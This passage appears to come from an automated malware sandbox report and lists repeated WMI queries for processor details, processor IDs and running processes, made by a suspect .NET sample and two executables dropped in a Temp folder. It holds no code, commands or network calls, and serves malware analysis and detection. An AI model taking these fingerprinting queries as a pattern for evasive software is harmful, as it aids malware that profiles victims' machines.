                    Source: zrrHgsDzgS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
